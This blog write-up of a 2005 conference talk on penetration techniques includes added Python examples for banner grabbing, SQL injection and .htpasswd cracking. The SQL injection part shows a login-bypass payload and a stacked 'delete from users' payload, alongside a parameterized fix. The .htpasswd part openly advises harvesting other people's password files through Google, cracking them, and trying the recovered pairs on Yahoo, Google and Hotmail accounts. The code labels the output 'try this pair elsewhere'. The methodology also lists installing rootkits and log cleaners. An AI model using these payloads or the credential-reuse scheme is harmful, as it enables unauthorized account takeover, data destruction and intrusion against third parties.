
Tobi Waves



OSCON Talk: The Latest (and Craftiest) Attack & Penetration Techniques and Tools

Thursday, August 04, 2005 13:39 // Portland, Oregon, US

The main problem with security scanners is that they produce a lot of false positives. With a closed-source tool there is no way for you to find out where a false positive comes from. With open-source tools you can read the check that fired, and these issues can be resolved easily.

Penetration Methodology

a) Discovery stage with whois, traceroute, google

b) Scanning to figure out which boxes exist

c) Service enumeration (service identification and banner grabbing). Identify a service by what it says, not by its port number, so you do not get confused by services running on non-standard ports.

d) Exploit known vulnerabilities if you can identify versions of services.

e) Install rootkits and log-cleaning tools.

Obviously only steps a) to c) are executed by security testing companies.
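The point in step c) is that the port number is only a hint. Below is an added example (not code from the talk or from any of the tools it mentions) that classifies services by banner content and flags the cases where the banner does not match the well-known port. The banners in SAMPLE_RESULTS are constructed for the example; grab_banner is a minimal probe that needs network access and is only here to show where real data would come from.

```python
import re
import socket

# Service expected on a well-known port; used only to flag mismatches.
WELL_KNOWN = {21: "ftp", 22: "ssh", 25: "smtp", 80: "http", 443: "http", 8080: "http"}

# Signatures matched against the banner itself, never against the port.
SIGNATURES = [
    ("ssh", re.compile(rb"^SSH-\d\.\d-")),
    ("http", re.compile(rb"^HTTP/\d\.\d \d{3}")),
    ("smtp", re.compile(rb"^220[ -].*E?SMTP", re.IGNORECASE)),
    ("ftp", re.compile(rb"^220[ -].*FTP", re.IGNORECASE)),
]


def identify_service(banner: bytes) -> str:
    """Return the service name implied by the banner, or 'unknown'."""
    for name, pattern in SIGNATURES:
        if pattern.search(banner):
            return name
    return "unknown"


def grab_banner(host: str, port: int, timeout: float = 3.0) -> bytes:
    """Connect, wait briefly for a server-initiated banner (SSH, SMTP, FTP),
    and if nothing arrives send a minimal HTTP request to provoke one.
    Requires network access; not exercised by the sample below."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.settimeout(timeout)
        try:
            data = s.recv(1024)
        except socket.timeout:
            data = b""
        if not data:
            s.sendall(b"HEAD / HTTP/1.0\r\n\r\n")
            try:
                data = s.recv(1024)
            except socket.timeout:
                data = b""
        return data


def enumerate_services(results):
    """results: iterable of (port, banner) pairs.
    Returns a list of (port, identified_service, note)."""
    out = []
    for port, banner in results:
        svc = identify_service(banner)
        expected = WELL_KNOWN.get(port)
        if expected is None:
            note = "non-standard port"
        elif svc == expected:
            note = "as expected"
        else:
            note = f"expected {expected} on port {port}"
        out.append((port, svc, note))
    return out


# Constructed scan results: a web server on 22, SSH on 8022, and
# something on 80 that is not HTTP at all.
SAMPLE_RESULTS = [
    (22, b"HTTP/1.1 400 Bad Request\r\nServer: nginx\r\n"),
    (8022, b"SSH-2.0-OpenSSH_9.6\r\n"),
    (25, b"220 mail.example.test ESMTP Postfix\r\n"),
    (21, b"220 (vsFTPd 3.0.3)\r\n"),
    (80, b"\x00\x01\x02\x03"),
]

if __name__ == "__main__":
    for port, svc, note in enumerate_services(SAMPLE_RESULTS):
        print(f"{port:5d}  {svc:8s}  {note}")
```

Anything reported as "unknown" or as a mismatch is exactly what a port-based scanner gets wrong, and is where the manual work of step c) starts.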

Google as a security tool

Google does not distinguish private information from public information. You can often find xls and doc files in Google that were never meant to be published.

Another great resource is web server directories without index files: the server returns a directory listing, and Google indexes it.

Error messages also get indexed by Google. PHP apps are especially helpful in this respect, revealing lots of internal information such as path and file names.

Webcams use standard file names, so if you search for these strings you can easily find lots of them.

If you find .htpasswd files via Google you can pull them, crack the hashes with John the Ripper, and then try the user name/password combinations on Yahoo, Google and Hotmail. Since users often reuse user names and passwords, this has a high probability of success.

The biggest advantage of Google, though, is that the queries go to Google and never touch the target, so the target cannot detect them (Google itself, of course, logs them).
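As an added example of the .htpasswd step above (not code from the talk; a stand-in for the one hash type that John would handle in seconds): parse an .htpasswd file, recognise the hash format of each entry, run a wordlist against the unsalted {SHA} entries, and hand everything else off by format name. SAMPLE_HTPASSWD and SAMPLE_WORDLIST are constructed for the example; the $apr1$ line is a placeholder, not a real hash.

```python
import base64
import hashlib
import re

# Constructed .htpasswd content (not a real file). The {SHA} entry is the
# standard encoding of the password "password"; the $apr1$ line is a dummy.
SAMPLE_HTPASSWD = """\
# staging site
admin:{SHA}W6ph5Mm5Pz8GgiULbPgzG37mj9g=
deploy:$apr1$xyzzy123$notarealhashvalueXXXXXXXXX
"""

# Constructed wordlist; a real run would read a dictionary file.
SAMPLE_WORDLIST = ["letmein", "password", "summer2005"]


def parse_htpasswd(text):
    """Yield (user, digest) pairs, skipping comments and blank lines."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        user, _, digest = line.partition(":")
        if user and digest:
            yield user, digest


def hash_format(digest):
    """Classify the htpasswd digest by its prefix/shape."""
    if digest.startswith("{SHA}"):
        return "sha1"                       # unsalted base64(sha1(pw))
    if digest.startswith("$apr1$"):
        return "apr1-md5"                   # Apache's iterated MD5 (salted)
    if digest.startswith(("$2a$", "$2b$", "$2y$")):
        return "bcrypt"
    if re.fullmatch(r"[./0-9A-Za-z]{13}", digest):
        return "crypt"                      # traditional DES crypt(3)
    return "unknown"


def sha1_htpasswd(password):
    """Encode a password the way 'htpasswd -s' does."""
    raw = hashlib.sha1(password.encode()).digest()
    return "{SHA}" + base64.b64encode(raw).decode()


def crack_htpasswd(text, wordlist):
    """Return (cracked, unsupported): cracked is a list of (user, password)
    pairs, unsupported a list of (user, format) to pass on to John."""
    cracked, unsupported = [], []
    for user, digest in parse_htpasswd(text):
        fmt = hash_format(digest)
        if fmt != "sha1":
            unsupported.append((user, fmt))
            continue
        for word in wordlist:
            if sha1_htpasswd(word) == digest:
                cracked.append((user, word))
                break
    return cracked, unsupported


if __name__ == "__main__":
    found, rest = crack_htpasswd(SAMPLE_HTPASSWD, SAMPLE_WORDLIST)
    for user, pw in found:
        print(f"{user}:{pw}   <- try this pair elsewhere")
    for user, fmt in rest:
        print(f"{user}: {fmt} hash, run through john")
```

Note that the {SHA} scheme is unsalted, so one hash of each wordlist entry covers every user in every file you collect; that is why these files are worth picking up in bulk.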

For greater efficiency one could write a script that uses Google's web service API to run the interesting queries against a given target automatically (the SOAP search API that was current in 2005 has since been retired, so today this means a different interface or the regular search pages).

Nessus

The coolest thing about Nessus is that it is very easily extensible. It comes with its own optimized scripting language, NASL (Nessus Attack Scripting Language). The advantage of writing checks in NASL rather than in some random scripting language is that NASL scripts plug right into the comprehensive Nessus user interface and reporting.

SQL injection in web applications

Many web applications have only rudimentary input validation. A typical login check builds the query by pasting the submitted values into the SQL text:

$sql = "select * from users where user='$a' and password='$b'";

How about trying to log in with the password

' or true -- 

This would end up as

select * from users where user='ddd' and password='' or true -- '

Since and binds tighter than or, the where clause is true for every row; the -- turns the closing quote the application appends into a comment, so the query parses and returns the first user, and the login succeeds (in MySQL the -- needs a trailing space; ' or 1=1 -- works the same way on databases without a true literal). The possibilities are limitless. By adding a '; you could even start a completely new command, provided the driver executes more than one statement at a time.
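The following is an added example, not code from the talk: the page's $sql construction rebuilt with Python and SQLite, the bypass payload run against it, the same payload run against a parameterized version of the query, and the stacked-statement case using executescript (which, unlike execute, runs several statements, standing in for drivers that allow it). The users table and its single account are constructed for the example.

```python
import sqlite3


def make_db():
    """Constructed in-memory users table with one account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (user text, password text)")
    conn.execute("insert into users values ('alice', 'correct horse')")
    return conn


def login_vulnerable(conn, user, password):
    """Same construction as the page's $sql line: input pasted into SQL text."""
    sql = f"select * from users where user='{user}' and password='{password}'"
    return conn.execute(sql).fetchone() is not None


def login_fixed(conn, user, password):
    """Parameterized query: values travel separately from the SQL text,
    so a quote in the password is just a character in a string."""
    sql = "select * from users where user=? and password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None


def demo():
    """Run both logins with legitimate credentials and with the bypass payload."""
    conn = make_db()
    # 1=1 is the portable spelling of the page's 'or true'; the trailing
    # space after -- is what MySQL requires for a comment.
    payload = "' or 1=1 -- "
    return {
        "legit_vuln": login_vulnerable(conn, "alice", "correct horse"),
        "bypass_vuln": login_vulnerable(conn, "ddd", payload),
        "legit_fixed": login_fixed(conn, "alice", "correct horse"),
        "bypass_fixed": login_fixed(conn, "ddd", payload),
    }


def stacked_statement_demo():
    """The '; trick from the text: close the string, end the statement, and
    start a new one. sqlite3's execute() refuses multiple statements, so
    executescript() plays the role of a driver that does not.
    Returns the number of rows left in users afterwards."""
    conn = make_db()
    payload = "'; delete from users; -- "
    sql = f"select * from users where user='ddd' and password='{payload}'"
    conn.executescript(sql)
    return conn.execute("select count(*) from users").fetchone()[0]


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name:13s} -> {'logged in' if ok else 'rejected'}")
    print("rows left after stacked statement:", stacked_statement_demo())
```

The only defence that holds for arbitrary input is the parameterized form; filtering quotes out of $b leaves every other injection point in the application untouched.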

Absinthe (0x90.org ...) is a tool that tries to automate these attacks.

Tools

Metasploit is a point-and-click root tool (metasploit.com ...)

Wikto is an automated, Google-enabled web site vulnerability scanner (www.sensepost.com ...)

Ettercap: network MITM attacks, content filtering, sniffing, etc. (ettercap.sourceforge.net ...)

Whax is a live Linux distro with lots of A&P tools (iwhax.net ...)
